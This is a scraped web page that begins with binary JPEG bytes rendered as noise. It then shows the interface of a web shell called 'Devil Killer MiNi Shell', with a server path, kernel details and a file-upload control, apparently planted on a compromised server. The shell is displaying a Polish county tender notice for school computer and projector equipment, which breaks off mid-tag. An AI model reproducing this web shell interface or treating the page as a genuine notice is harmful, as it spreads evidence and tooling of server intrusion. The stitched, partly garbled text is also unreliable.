JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221230/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221230/0052491201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Wyposażenie i doposażenie pracowni oraz warsztatów szkolnych w ramach projektu „Nowoczesne szkolnictwo zawodowe w powiecie gnieźnieńskim&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT GNIEŹNIEŃSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631258046</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Papieża Jana Pawła II 9/10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gniezno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@powiat-gniezno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiat-gniezno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wyposażenie i doposażenie pracowni oraz warsztatów szkolnych w ramach projektu „Nowoczesne szkolnictwo zawodowe w powiecie gnieźnieńskim&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f511cb79-8754-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00524912</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00034648/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Wyposażenie i dostarczenie do pracowni oraz warsztatów szkolnych w ramach projektu &#34;Nowoczesne szkolnictwo zawodowe w powiecie gnieźnieńskim&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie współfinansowane jest ze środków Europejskiego Funduszu Społecznego w ramach Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2014-2020 w ramach projektu nr RPWP.08.03.01-30-0039.21 pn. „Nowoczesne szkolnictwo zawodowe w powiecie gnieźnieńskim”. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiat-gniezno.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W przedmiotowym postępowaniu komunikacja między Zamawiającym , a<br/>Wykonawcami w tym wnioski, zawiadomienia i informacje, a w szczególności składanie ofert, oraz oświadczeń i dokumentów, odbywa się przy użyciu środków komunikacji elektronicznej za<br/>pośrednictwem Platformy znajdującej się pod adresem: https://powiat-gniezno.ezamawiajacy.pl<br/>2. Oferty, oświadczenia sporządza się pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej. Zgodnie z art. 61. ust. 1. oraz art. 63 ust. 2 ustawy Pzp komunikacja w niniejszym postępowaniu odbywa się wyłącznie przy użyciu środków<br/>komunikacji elektronicznej, pliki należy opatrzyć:<br/>- kwalifikowanym podpisem elektronicznym lub<br/>- podpisem zaufanym lub<br/>- podpisem osobistym.<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na platformie zakupowej https://powiat-gniezno.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Na stronie internetowej pod adresem:<br/>https://powiat-gniezno.ezamawiajacy.pl/, w zakładce Baza Wiedzy/Plany zamówień publicznych w katalogu „Instrukcja dla Wykonawcy” – Instrukcja dla Wykonawcy dla postępowań opublikowanych od 01.01.2021 znajdują się instrukcje korzystania z Platformy dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych<br/>czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy. Regulamin korzystania z platformy eZamawiajacy<br/>dostępny pod adresem https://oneplace.marketplanet.pl/regulamin_ezamawiajacy<br/>Wymagania sprzętowo aplikacyjne umożliwiające pracę na Platformie zakupowej tj.:<br/>1.1.Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>1.2.Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>1.3.Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej w przypadku Internet Explorer minimalnie wersja 10.0<br/>1.4.	Włączona obsługa JavaScript;<br/><br/>1.5.	Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>12.	Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w rekomendowanych formatach pdf., excel., doc., zip, 7zip.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zamawiający informuje, że administratorem Pani/Pana danych osobowych jest Starosta Gnieźnieński, Starostwo Powiatowe w Gnieźnie, ul. Papieża Jana Pawła II 9/10, 62-200 Gniezno, tel. 61 424 07 06; administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@powiat-gniezno.pl<br/>2.Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym, o jakim stanowi art. 275 pkt 1 uPzp oraz w ceku wykonania umowy w kategorii dane zwykłe/dane wrażliwe, o których mowa w art. 9 i/lub art. 10 RODO oraz w celu archiwizacji. 3.Do przetwarzania danych osobowych w kategorii dane wrażliwe dotyczące wyroków skazujących, o których mowa w<br/>art. 10 RODO, dopuszczone są wyłącznie osoby posiadające pisemne upoważnienie administratora danych. Osoby takie są ponadto<br/>zobowiązane do zachowania tych danych w poufności. 4.Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w - art. 74 uPzp. 5.W odniesieniu do danych osobowych w kategorii dane wrażliwe dotyczące wyroków skazujących, o których mowa w art. 10 RODO, Zamawiający będzie udostępniał te dane jedynie w sytuacji, w której ich ujawnianie jest niezbędne w celu umożliwienia korzystania ze środków ochrony prawnej. Po upływie terminu<br/>na skorzystanie ze środków ochrony prawnej albo w przypadku, gdy o dostęp do dokumentów zawierających te dane ubiegają się podmioty, którym nie przysługuje prawo do korzystania ze środków ochrony prawnej, Zamawiający będzie udostępniał dane osobowe zawarte w ww. dokumentach po ich odpowiednim pseudonimowaniu.6.Protokół postępowania wraz z załącznikami jest<br/>jawny z wyłączeniem danych, o których mowa w art. 9 ust. 1 RODO, zebranych w toku postępowania o udzielenie zamówienia publ.<br/>7.Pani/Pana dane osobowe będą przechowywane - art. 78 ust. 1 uPzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy,chyba że niezbędny będzie dłuższy okres przetwarzania np. z uwagi na dochodzenie roszczeń lub inny obowiązek wymagany przez przepisy prawa powszechnie obowiązującego.8.Pani /Pana dane osobowe będą przechowywane przez okres niezbędny do zrealizowania celu, dla którego zostały zebrane, a następnie przez okres archiwizacji ustalony w JRWA- art. 6 ust. 2 ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach. Dla dokumentów wytworzonych w ramach zamówień publicznych krajowych jest to okres 5 lat, dla zamówień publicznych unijnych jest to okres 10 lat. Natomiast umowy cywilno-prawne wraz z dokumentacją dotyczącą ich realizacji, niezależnie od trybu w jakim zostały zawarte, przechowywane są przez okres 10 lat. Okres przechowywania liczony jest od 1 stycznia roku następnego od daty zakończenia sprawy9.Obowiązek podania przez Panią/Pana<br/>danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych uPzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.10.W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.11.Posiada Pani/Pan: a)na podst art. 15 RODO prawo<br/>do danych osobowych Pani/Pana dotyczących; b)na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>c)na podst art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>d)prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">12.Nie przysługuje Pani/Panu:<br/>a)w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>13.Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.<br/>14.W przypadku udostępnienia Zamawiającemu przez podmiot biorący udział w postępowaniu o udzielenie zamówienia, danych osobowych swoich pracowników, zleceniobiorców, pełnomocników, członków zarządu, wspólników, współpracowników, kontrahentów, dostawców, beneficjentów rzeczywistych lub innych osób, Zamawiający wnosi o poinformowanie tych osób o danych<br/>administratora/Zamawiającego, o danych IOD, o celach przetwarzania, kategoriach danych, odbiorcach i o przetwarzaniu danych osobowych na zasadach określonych powyżej.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WOA.272.20.2022.WI</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I. Część 1 – Doposażenie jednostek oświatowych w sprzęt elektroniczny <br/>i komputerowy w zakresie jak poniżej:<br/>Lp.	Przedmiot	Ilość<br/>1.	Laptop	10 szt.<br/>2.	Laptop	4 szt.<br/>3.	Ekran	2 szt.<br/>4.	Projektor	2 szt.<br/>5.	Uchwyt do projektora	2 szt.<br/>6.	Drukarka	2 szt.<br/>II. Szczegółowy opis oraz zestawienia asortymentowo-ilościowe przedmiotu zamówienia określają:<br/>a)	Formularz cenowy- załącznik nr 1A do SWZ<br/>b)	Opis przedmiotu zamówienia (OPZ) -załącznik nr 3 do SWZ<br/>III. Szczegółowe wymagania w zakresie realizacji zamówienia, sposobu i terminu finansowania i płatności określają projektowane postanowienia umowy – załącznik nr 4 do SWZ.<br/>IV. Wymagania związane z realizacją zamówienia:<br/>1)	Przedmiot zamówienia musi być fabrycznie nowy, wolny od wad konstrukcyjnych, materiałowych, wykonawczych i prawnych, nie może posiadać znamion użytkowania. Wszystkie dostarczone elementy wyposażenia składające się na przedmiot zamówienia muszą zawierać odpowiednie, aktualne i wymagane certyfikaty, świadectwa jakości, atesty, deklaracje zgodności lub oznaczenia, informujące o dopuszczeniu do sprzedaży oraz spełniać wszelkie wymogi norm określonych obowiązującym prawem. <br/>2)	Wykonawca udzieli gwarancji na przedmiot zamówienia na okres co najmniej 24 miesięcy. Okres gwarancji rozpoczyna swój bieg od dnia końcowego odbioru dostawy. Okres gwarancji na przedmiot zamówienia stanowi kryterium oceny ofert. Sposób oceny ofert w tym kryterium opisano w części XVIII SWZ. <br/>3)	Warunki gwarancji nie mogą nakazywać Zamawiającemu przechowywania opakowań, w których urządzenia zostaną dostarczone, Zamawiający może usuną opakowania urządzeń po ich dostarczeniu co nie spowoduje utraty gwarancji, a dostarczony sprzęt mimo braku opakowań będzie podlegał usłudze gwarancyjnej. Zasady korzystania z gwarancji i rękojmi określone zostały w § 8 projektowanych postanowień umowy, stanowiących załącznik nr 4 do SWZ.<br/>Okres rękojmi odpowiada okresowi udzielonej przez Wykonawcę gwarancji, jednak nie mniej niż okres wynikający z przepisów Kodeksu cywilnego i zaczyna biec od dnia odbioru końcowego dostawy bez zastrzeżeń przez Zamawiającego.<br/>4)	Zamawiający wymaga, by Wykonawca we flocie pojazdów samochodowych (w rozumieniu art. 2 pkt 33 ustawy z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym) użytkowanych przy wykonywaniu zadania publicznego dysponował odpowiednią liczbą pojazdów elektrycznych lub napędzanych gazem ziemnym, spełniając tym samym wymagania wynikające postanowień art. 68 ust. 3 w związku z art. 35 ust. 2 pkt 2 ustawy z dnia 11 stycznia 2018 r. o elektromobilności i paliwach alternatywnych, o ile wykonanie zamówienia będzie wymagało użycia pojazdów samochodowych.<br/>Rozwiązania równoważne:<br/>1)	W przypadku, gdy wymagania w opisie przedmiotu zamówienia odnoszą się do znaku towarowego, patentu lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę, wszędzie tam Zamawiający wskazuje wyraz „lub równoważne” i dopuszcza możliwość składania ofert równoważnych.<br/>2)	Zamawiający wskazał w części I w opisie przedmiotu zamówienia - załącznik nr 3 do SWZ znak towarowy oprogramowania, jako wzorzec funkcjonalno-jakościowy przedmiotu zamówienia. Oznacza to tym samym, że Zamawiający dopuszcza złożenie oferty zawierającej oprogramowania równoważne o parametrach funkcjonalnych i wydajnościowych nie gorszych od parametrów systemu operacyjnego określonego we wzorcu, o ile jednocześnie zostaną zachowane pozostałe wymagania określone w SWZ.<br/>3)	W przypadku składania przez Wykonawcę w ofercie propozycji równoważnych do opisanych w opisie przedmiotu zamówienia, to na Wykonawcy ciąży wykazanie i przedstawienie dowodu, iż oferowane rozwiązania są zgodne z wymaganiami Zamawiającego. W takim przypadku Wykonawca przedstawi w ofercie dowód równoważności za pomocą przedmiotowych środków dowodowych, tj. opis charakterystyki zaoferowanego produktu, który będzie zawierać co najmniej: <br/>-	nazwę producenta typ lub model zaoferowanego produktu (jeśli dotyczy);<br/>-	wszystkie parametry zaoferowanego produktu (jeśli dotyczy) odnosząc się do każdego z wymagań określonych w opisie przedmiotu zamówienia – Wykonawca zobowiązany jest podać konkretne wielkości parametrów lub cechy, które posiada zaoferowany produkt w kontekście każdego wymaganego parametru lub cechy określonej przez Zamawiającego w opisie przedmiotu zamówienia.<br/>4)	Zgodnie z art. 101 ust. 4 ustawy Pzp w sytuacji, gdyby w dokumentach opisujących przedmiot zamówienia, zawarto odniesienie do norm, ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 ustawy Pzp, a takim odniesieniom nie towarzyszyło wyrażenie „lub równoważne”, to Zamawiający dopuszcza rozwiązania równoważne opisywanym w każdej takiej normie, ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych. W związku z powyższym należy przyjąć, że każdej: normie, ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji technicznych występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub równoważne”. <br/>5)	Zgodnie z art. 101 ust. 5 Pzp Wykonawca, który powołuje się na rozwiązania równoważne opisywanym w tych dokumentach, jest obowiązany udowodnić, poprzez dołączenie do oferty stosownych przedmiotowych środków dowodowych, o których mowa w art. 104–107 ustawy Pzp, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia.<br/>6)	Przedmiotowe środki dowodowe służące ocenie spełnienia wymagań zaoferowanego produktu równoważnego nie będą podlegały uzupełnieniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30236000-2 - Różny sprzęt komputerowy</p> <p class="mb-0">30213100-6 - Komputery przenośne</p> <p class="mb-0">32322000-6 - Urządzenia multimedialne</p> <p class="mb-0">48620000-0 - Systemy operacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryteria :<br/>A. Cena<br/>Oferty nieodrzucone oceniane będą według wzoru:<br/>LP=najniższa cena brutto (zł)spośród ofert nie podlegających odrzuceniu / cena brutto badanej oferty(zł) x 60% x 100<br/><br/>B. Okres gwarancji na przedmiot umowy:<br/>Dla celów powyższego kryterium w formularzu ofertowym - załącznik nr 1 do SWZ, Wykonawca poda długość okresu gwarancji w miesiącach na zaoferowany przedmiot umowy. <br/>Minimalny okres gwarancji wynosi 24 miesiące od dnia podpisania protokołu odbioru końcowego (za taki okres gwarancji Wykonawca nie otrzyma żadnych punktów). Maksymalny okres gwarancji – 60 miesięcy od dnia podpisania protokołu odbioru końcowego przedmiotu umowy. Termin obowiązywania gwarancji rozpoczyna bieg od dnia końcowego odbioru przedmiotu zamówienia. <br/>Zaproponowanie okresu gwarancji w przedziale od 25 do 60 miesięcy będzie podlegało punktacji według poniższego wzoru:<br/>LP= Okres gwarancji badanej oferty / Najdłuższy okres gwarancji spośród ofert nie podlegających odrzuceniu x 40% x 100<br/>* zaoferowany (punktowany) okres gwarancji nie może być krótszy niż 25 miesięcy<br/>** zaoferowany (punktowany) okres gwarancji nie może być dłuższy niż 60 miesięcy.<br/>2.	Zamawiający udzieli zamówienia Wykonawcy, który złożył najkorzystniejszą z największą ilością uzyskanych punktów ofertę obejmującą realizację całości zamówienia, stanowiącą sumę punktów przyznanych w ramach każdego z podanych kryteriów udzielenia zamówienia na podstawie wzoru: LP= A+B.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na przedmiot umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 